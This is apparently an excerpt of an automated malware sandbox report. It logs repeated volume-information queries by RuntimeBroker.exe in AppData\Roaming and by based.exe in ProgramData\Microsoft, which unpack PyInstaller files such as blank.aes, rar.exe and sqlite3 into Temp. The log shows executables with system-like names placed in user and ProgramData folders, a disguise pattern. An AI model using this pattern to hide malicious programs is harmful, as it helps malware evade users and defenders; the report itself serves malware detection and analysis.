Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libcrypto-1_1.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libffi-7.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libssl-1_1.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\sqlite3.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\VCRUNTIME140.dll VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
